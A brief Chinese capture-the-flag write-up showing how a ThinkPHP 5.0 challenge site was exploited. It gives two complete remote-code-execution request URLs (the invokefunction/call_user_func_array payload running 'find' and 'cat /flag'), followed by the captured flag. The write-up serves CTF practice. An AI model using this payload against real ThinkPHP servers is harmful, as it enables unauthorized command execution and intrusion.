php_rce
访问题目链接,发现网站使用框架为 ThinkPHP 5.0,结合题目提示,应该存在 ThinkPHP RCE漏 洞
- 查找 flag:
http://220.249.52.133:46433/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22
2.cat flag
http://220.249.52.133:46433/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag
flag{thinkphp5_rce}
by hsc-浓眉